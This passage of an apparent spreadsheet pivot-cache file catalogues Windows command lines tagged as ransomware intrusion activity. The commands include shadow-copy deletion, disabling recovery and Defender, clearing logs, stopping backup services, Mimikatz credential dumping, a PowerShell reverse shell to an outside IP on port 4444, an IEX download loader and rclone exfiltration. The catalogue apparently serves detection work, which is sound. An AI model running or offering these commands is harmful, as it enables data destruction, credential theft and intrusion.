    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid0507"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -exec bypass -EncodedCommand "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0509"/>
    <m/>
    <m/>
    <s v="powershell.exe -executionpolicy remotesigned -File .\Get-DataInfo.ps1 method"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid1044"/>
    <m/>
    <m/>
    <s v="cmd.exe /c C:\ProgramData\Anydesk.exe --install c:\ProgramData\AnyDesk --start-with-win --silent"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1045"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealTimeMoniroring $True"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1049"/>
    <m/>
    <m/>
    <s v="cmd.exe /c C:\ProgramData\Anydesk.exe --get-id"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1051"/>
    <m/>
    <m/>
    <s v="HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1053"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c echo 00e4f7418cd &gt; \\.\pipe\9090e9"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1054"/>
    <m/>
    <m/>
    <s v="vssadmin delete shadows /all /quiet "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1055"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1056"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic shadowcopy /nointeractive"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1057"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} bootstatuspolicy ignoreallfailures"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1058"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1059"/>
    <m/>
    <m/>
    <s v="wevutil cl &lt;log name&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1061"/>
    <m/>
    <m/>
    <s v="sc stop eventlog"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1062"/>
    <m/>
    <m/>
    <s v="sc stop MSSQL$VEEAMSQL2016"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1063"/>
    <m/>
    <m/>
    <s v="sc stop SQLTELEMETRY$VEEAMSQL2016"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1064"/>
    <m/>
    <m/>
    <s v="sc stop VeeamAWSSvc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1065"/>
    <m/>
    <m/>
    <s v="sc stop VeeamAzureSvc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1066"/>
    <m/>
    <m/>
    <s v="sc stop Veeam&lt;service name&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1068"/>
    <m/>
    <s v="Beacon"/>
    <s v="C:\Windows\system32\rundll.exe&quot; c:\programdata\update.dll, HTVLyKUVoTzv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1077"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netstat -an"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1079"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic logicaldisk list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1080"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic diskdrive list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1081"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic memphysical list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1082"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic memlogical list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1083"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic memcache list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1084"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic pagefile list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1085"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic netprotocal list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1086"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic bios list brief"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1087"/>
    <m/>
    <m/>
    <s v="wmic csproduct"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1088"/>
    <m/>
    <m/>
    <s v="cmde.exe /c arp -a"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1089"/>
    <m/>
    <m/>
    <s v="nbtscan.exe -v -s &lt;host&gt;/24"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1094"/>
    <m/>
    <m/>
    <s v="netsh.exe interface portproxy show all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1096"/>
    <m/>
    <m/>
    <s v="netsh.exe advfirewall firewall add rule name=forwarded protocol=TC dir=in localip=&lt;redact&gt; localport=3390 action=allow"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1097"/>
    <m/>
    <m/>
    <s v="netsh.exe interface portproxy delete v4tov4 listenport=3390 listenaddress=&lt;redacted&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9"/>
  </r>
  <r>
    <s v="ransom-eid1099"/>
    <m/>
    <m/>
    <s v="7za.exe a -tzip -mx5 c:programData\&lt;redact&gt;.zip C:\programData\&lt;redact&gt;.pdf -pTOPSECRETPASSWORD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1100"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netscan.exe /hide /auto:&quot;result.xml&quot; /config:netscan.xml /range:&lt;redact&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1101"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1102"/>
    <m/>
    <m/>
    <s v="cmd.exe /c type found_shares.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1103"/>
    <m/>
    <m/>
    <s v="msiexec.exe /I setup.msi"/>
    <m/>
    <m/>
    <s v="document8765.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1105"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <s v="screenconnect.clientservices.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1106"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <s v="screenconnect.clientservices.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1108"/>
    <m/>
    <m/>
    <s v="MpCmdRun.exe -DisableService"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1109"/>
    <m/>
    <m/>
    <s v="rclone.exe config"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1110"/>
    <m/>
    <m/>
    <s v="rclone.exe copy"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18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18"/>
  </r>
  <r>
    <s v="ransom-eid0622"/>
    <m/>
    <m/>
    <s v="“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid1113"/>
    <m/>
    <m/>
    <s v="cmd.exe /c &quot;C:\Windows\TEMP\ScreenConnect\22.8.9717.8313\{&lt;uuid&gt;}run.cmd&quot;"/>
    <m/>
    <m/>
    <s v="screenconnect.clientservices.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18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26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26"/>
  </r>
  <r>
    <s v="ransom-eid0628"/>
    <m/>
    <m/>
    <s v="powershell Uninstall-WindowsFeature -Name Windows-Defender"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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18"/>
  </r>
  <r>
    <s v="ransom-eid0632"/>
    <m/>
    <m/>
    <s v="“powershell -command \”Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | FT Name\””"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid1119"/>
    <m/>
    <s v="MetaSploit Powerfun"/>
    <s v="New-Object System.Net.Sockets.TCPClient(&quot;94.232.43.201&quot;,4444)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1120"/>
    <m/>
    <s v="MetaSploit Powerfun"/>
    <s v="[System.Net.Sockets.TcpListener]4444"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0786"/>
    <m/>
    <m/>
    <s v="powershell -f  Veeam-Get-Creds-New.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27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18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18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18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18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18"/>
  </r>
  <r>
    <s v="ransom-eid1137"/>
    <m/>
    <s v="Custom Mimikatz"/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <s v="m2.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1138"/>
    <m/>
    <s v="Custom Mimikatz"/>
    <s v="privilege::debug"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1139"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <s v="cmd.exe /c &quot;C:\Windows\TEMP\ScreenConnect\22.8.9717.8313\{&lt;uuid&gt;}run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1140"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <s v="cmd.exe /c &quot;C:\Windows\TEMP\ScreenConnect\22.8.9717.8313\{&lt;uuid&gt;}run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0817"/>
    <m/>
    <m/>
    <s v="powershell Remove-Item (Get-PSReadlineOption).HistorySavePath"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28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8"/>
  </r>
  <r>
    <s v="ransom-eid1150"/>
    <m/>
    <m/>
    <s v="rclone.exe copy &quot;E:\&lt;redacted&gt;&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1152"/>
    <m/>
    <m/>
    <s v="net1 user administrator &lt;pwd&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1153"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="&quot;C:\Windows\System32\wbem\WMIC.exe&quot; shadowcopy delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1154"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\System32\vssadmin.exe&quot; delete shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1155"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\System32\bcdedit.exe&quot; /set {default} recoveryenabled No"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1156"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\System32\bcdedit.exe&quot; /set {default} bootstatuspolicy ignoreallfailures"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18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18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1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1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10"/>
  </r>
  <r>
    <s v="ransom-eid1161"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe /c &quot;&quot;D:\demurest.cmd&quot; &quot;"/>
    <s v="C:Windows\Explorer.EXE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1162"/>
    <m/>
    <s v="Beacon"/>
    <s v="rundll32.exe 1.dll, DllRegisterServer"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid0918"/>
    <m/>
    <m/>
    <s v="powershell.exe -Command &quot;Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"/>
    <m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10"/>
  </r>
  <r>
    <s v="ransom-eid1165"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8897/'); Invoke-SessionGopher"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1166"/>
    <m/>
    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1167"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1168"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1175"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1180"/>
    <m/>
    <m/>
    <s v="cmd.exe /C dir *.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1181"/>
    <m/>
    <m/>
    <s v="cmd.exe /C dir *.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1188"/>
    <m/>
    <m/>
    <s v="7.exe a -mx3 ad.7z ad_*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1190"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ns.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1191"/>
    <m/>
    <m/>
    <s v="nslookup [REDACTED HOST X] "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1192"/>
    <m/>
    <m/>
    <s v="nslookup [REDACTED HOST XX]"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1193"/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\netscan.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1194"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /K copy k.exe \\&lt;host&gt;\c$\windows\temp\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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10"/>
  </r>
  <r>
    <s v="ransom-eid1196"/>
    <m/>
    <m/>
    <s v="psexec.exe \\&lt;host&gt; -u &lt;uname&gt; -p &lt;pwd&gt; -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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10"/>
  </r>
  <r>
    <s v="ransom-eid1199"/>
    <m/>
    <m/>
    <s v="c:\windows\temp\k.exe --config REDACTED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1201"/>
    <m/>
    <s v="Run Diag Box"/>
    <s v="rundll32.exe shell32.dll, #61"/>
    <s v="C:windows\system32\cmd.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1202"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot; chrome.exe"/>
    <s v="c:windows\system32\Dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1203"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot; outlook.exe"/>
    <s v="c:windows\system32\Dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1204"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot; msedge.exe"/>
    <s v="c:windows\system32\Dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1205"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot;rundll32.exe shell32.dll, #61"/>
    <s v="c:windows\system32\Dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1207"/>
    <m/>
    <m/>
    <s v="rundll32.exe c:\windows\temp\1.dll, DllRegisterServer"/>
    <s v="C:\Windows\system32\cmd.exe /c c:\windows\temp\1.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1208"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe /c echo 0c1d9073d25 &gt; \\.\pipe\e92a26"/>
    <s v="C:Windows\System32\svchost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="NT AUTHORITY\SYSTEM"/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1210"/>
    <m/>
    <s v="Injected Processes"/>
    <s v="C:\Windows\system32\svchost.exe -k DcomLaunch -p"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1211"/>
    <m/>
    <s v="Injected Processes"/>
    <s v="rundll32.exe c:\windows\temp\1.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1212"/>
    <m/>
    <s v="Injected Processes"/>
    <s v="C:\Windows\sysmon64.exe -z syscliprpc9E7B7D3FAF371803"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1213"/>
    <m/>
    <s v="Injected Processes"/>
    <s v="_x0009_C:\Windows\syswow64\regsvr32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1214"/>
    <m/>
    <s v="Injected Processes"/>
    <s v="C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1216"/>
    <m/>
    <s v="Injected Processes"/>
    <s v="winlogon.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1217"/>
    <m/>
    <m/>
    <s v="arp -a"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1218"/>
    <m/>
    <m/>
    <s v="chcp &gt;&amp;2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1219"/>
    <m/>
    <m/>
    <s v="chcp 65001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1220"/>
    <m/>
    <m/>
    <s v="chcp 65001 &amp;&amp; c: &amp;&amp; cd c:\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1221"/>
    <m/>
    <m/>
    <s v="dir \\&lt;REDACTED&gt;\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1222"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1231"/>
    <m/>
    <m/>
    <s v="net1 config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1234"/>
    <m/>
    <m/>
    <s v="ping &lt;HOST_IP&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1235"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1236"/>
    <m/>
    <m/>
    <s v="whoami"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1237"/>
    <m/>
    <m/>
    <s v="whoami /upn"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1243"/>
    <m/>
    <m/>
    <s v="addfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1245"/>
    <m/>
    <m/>
    <s v="C:windows\system32\cmd.exe /C adget.exe ad.zip"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1246"/>
    <m/>
    <m/>
    <s v="nslookup [REDACTED HOST X] "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid0951"/>
    <m/>
    <m/>
    <s v="start-process PowerShell.exe -arg C:\Users\Public\Music\&lt;file&gt;.ps1 -WindowStyle Hidden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1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1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11"/>
  </r>
  <r>
    <s v="ransom-eid1251"/>
    <m/>
    <m/>
    <s v="cmd.exe /c copy \\REDACTED\c$\windows\temp\p.bat c:\windows\temp\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1252"/>
    <m/>
    <m/>
    <s v="7.exe a -mx3 ad.7z ad_*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1254"/>
    <m/>
    <m/>
    <s v="cmd.exe /c copy \\SOURCE_SERVER_IP\c$\windows\temp\k.exe c:\windows\temp\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1255"/>
    <m/>
    <m/>
    <s v="c:\windows\temp\k.exe --config REDACTED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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11"/>
  </r>
  <r>
    <s v="ransom-eid1018"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="“c:\windows\syswow64\windowspowershell\v1.0\powershell.exe” -Version 5.1 -s -NoLogo -NoProfile"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1259"/>
    <m/>
    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
